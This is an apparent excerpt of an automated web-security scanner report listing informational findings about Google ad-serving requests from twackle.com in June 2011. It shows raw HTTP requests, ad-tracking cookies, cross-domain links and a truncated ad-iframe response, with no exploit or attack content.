http://ib.adnxs.com/ab?enc=U3dlFwwOEEBTd2UXDA4QQAAAAGBmZgpAU3dlFwwOEEBTd2UXDA4QQDnR7M6_o8sN_ayDGovBdy-l-fVNAAAAAIwuAAC1AAAANQEAAAIAAABtowUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gARgwBAgUCAQQAAAAANBzodQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307965861%29%3Buf%28%27r%27%2C+369517%2C+1307965861%29%3Bppv%2811776%2C+%27994068186971033913%27%2C+1307965861%2C+1310557861%2C+62058%2C+25553%29%3B&cnd=!fyJFHQjq5AMQ7cYWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcBh4lPoCgAGqAYgBMpABAZgBAaABA6gBA7ABAbkBBbzX-gsOEEDBAQW81_oLDhBAyQHIZ3f-33XzP9ABANkBAAAAAAAA8D_gAQA.&ccd=!hAX0Lgjq5AMQ7cYWGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX5pAAN4aQK5V1M5d5kiwbpvDLbQFvh6HfHtw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBifjQpPn1TaTDN8y6lQeLyfmuDu_675oCp439xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQysgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAKmDsACBMgCq4KlDqgDAegDiALoA7UI9QMAAADEgAausZaJi7qK4Hk%26num%3D1%26sig%3DAGiWqtzD4mTo_k9WRjcumZlMbdufIIW4TQ%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307983860&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965859921&bpp=4&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307965859956&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1764523785&ga_fc=1&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=13&biw=1049&bih=926&eid=33895299&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=412&xpc=QcXQLnEGo5&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.142. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982941&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964941358&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307964941513&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=219547393&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=304&xpc=JDtUapT6d9&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26adU%3DMyLocalComcast.com%26adT%3DComcast%25C2%25AE%2BLocal%2BCable%26adU%3Dwww.FitTrackingSolutions.com%26adT%3DTrack%2BYour%2BAction%2BItems%26gl%3DUS&usg=AFQjCNFTgf5rs2nBy4fvU-9542blBsQUdg

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982941&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964941358&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307964941513&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=219547393&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=304&xpc=JDtUapT6d9&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.143. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986619&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968619944&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307968619989&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=409403925&ga_fc=1&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=91&xpc=8GhqJB7mpo&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://s0.2mdn.net/2331885/5-CarsF_728x90_40K.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986619&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968619944&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307968619989&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=409403925&ga_fc=1&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=91&xpc=8GhqJB7mpo&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.144. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307983246&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965246030&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307965246064&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=164146876&ga_fc=1&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=119&xpc=cEaF9KS2e5&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110608/r20110607/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.terremark.com/%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGzuem3IaFVguP-ogrsdVygTfdoyQ

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307983246&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965246030&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307965246064&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=164146876&ga_fc=1&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=119&xpc=cEaF9KS2e5&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.145. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532506&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307969532175&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=47&xpc=uWQFB9gCLt&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://s0.2mdn.net/2331885/5-Stoplight_728x90_40K.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532506&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307969532175&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=47&xpc=uWQFB9gCLt&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.146. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986924&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968924562&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307968924605&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=462082330&ga_fc=1&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=85&xpc=SHEqpFgIsJ&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DTWCBC.com/Rochester%26adT%3DTime%2BWarner%2BCable%26adU%3DMyLocalComcast.com%26adT%3DTriple%2BPlay%2BFrom%2BXFINITY%25C2%25AE%26adU%3Dwww.Accolo.com/CloudRecruiting%26adT%3DApplicant%2Bor%2BApplication%253F%26gl%3DUS&usg=AFQjCNFa-0CVTfFSheMR0WKVDUSWlv1FlQ

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986924&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968924562&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307968924605&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=462082330&ga_fc=1&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=85&xpc=SHEqpFgIsJ&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.147. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003275&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964003248&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=2&dtd=15&xpc=d0qcQ5nqUh&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=Pbt868OaEUA9u3zrw5oRQAAAAGBmZgpAPbt868OaEUA9u3zrw5oRQFw_DXz-IxBV_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAANQEAAAIAAABsowUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAxQ4BAgUCAQQAAAAAjCOipgAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307964004%29%3Buf%28%27r%27%2C+369516%2C+1307964004%29%3Bppv%2811776%2C+%276129438668761153372%27%2C+1307964004%2C+1310556004%2C+62058%2C+25553%29%3B&cnd=!myKkJwjq5AMQ7MYWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcBh41PkCgAGkAYgBApABAZgBAaABA6gBA7ABAbkBLGw7zMOaEUDBASxsO8zDmhFAyQHUgi7Ovlb1P9ABANkBAAAAAAAA8D_gAQA.&ccd=!gwXrLgjq5AMQ7MYWGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfXyZAABJ3gK5X4Mhbwl1tTyt_FwRWIGsDa55A&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBVZuEZPL1TfjOBIz8lQfWy_CtCO_675oCp439xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQysgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAKIGMACBMgCq4KlDqgDAegDiALoA7UI9QMAAADAgAausZaJi7qK4Hk%26num%3D1%26sig%3DAGiWqtxhFKVXE_5ldfsYS5dxlj4a4SAmuw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003275&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964003248&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=2&dtd=15&xpc=d0qcQ5nqUh&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.148. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982941&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964941777&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964941513&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=219547393&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=13&biw=1049&bih=926&eid=33895299%2C33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=48&xpc=78Cn8v311w&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://exch.quantserve.com/pixel/p-7fziOTiEM1bCE.gif?media=ad&p=TfX2DwANMM0K7F5Hv-hpRkYZvFfKu_HkGEZFIg&r=1686505843&rand=24760&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.20,_imp.optdr.0&rtbip=70.42.105.14&rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAb7YkssDkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox
http://view.atdmt.com/MON/iview/285072717/direct/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBbuJwD_b1Tc3hNMe8sQfG0qH_C46foZQCzqPYkRbKmIe8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHQlMDzA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAKYB8ACBMgC9vHKCagDAegDiALoA7UI9QMAAADEgAaXo8vC4pXe_1g%26num%3D1%26sig%3DAGiWqtylYcba3Pgcvm6dTrRTW14H7ys05Q%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://exch.quantserve.com/r?a=p-7fziOTiEM1bCE;labels=_qc.clk,_click.adserver.rtb,_click.rand.24760;rtbip=70.42.105.14;rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAb7YkssDkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=
http://view.atdmt.com/MON/view/285072717/direct/01/

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982941&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964941777&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964941513&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=219547393&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=13&biw=1049&bih=926&eid=33895299%2C33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=48&xpc=78Cn8v311w&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:35:44 GMT
Server: cafe
Cache-Control: private
Content-Length: 4126
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:35:44 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><iframe src="http://view.atdmt.com/MON/iview/285072717/direct/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBbuJwD_b1Tc3hNMe8sQfG0qH_C46foZQCzqPYkRbKmIe8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHQlMDzA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAKYB8ACBMgC9vHKCagDAegDiALoA7UI9QMAAADEgAaXo8vC4pXe_1g%26num%3D1%26sig%3DAGiWqtylYcba3Pgcvm6dTrRTW14H7ys05Q%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://exch.quantserve.com/r?a=p-7fziOTiEM1bCE;labels=_qc.clk,_click.adserver.rtb,_click.rand.24760;rtbip=70.42.105.14;rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAb7YkssDkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
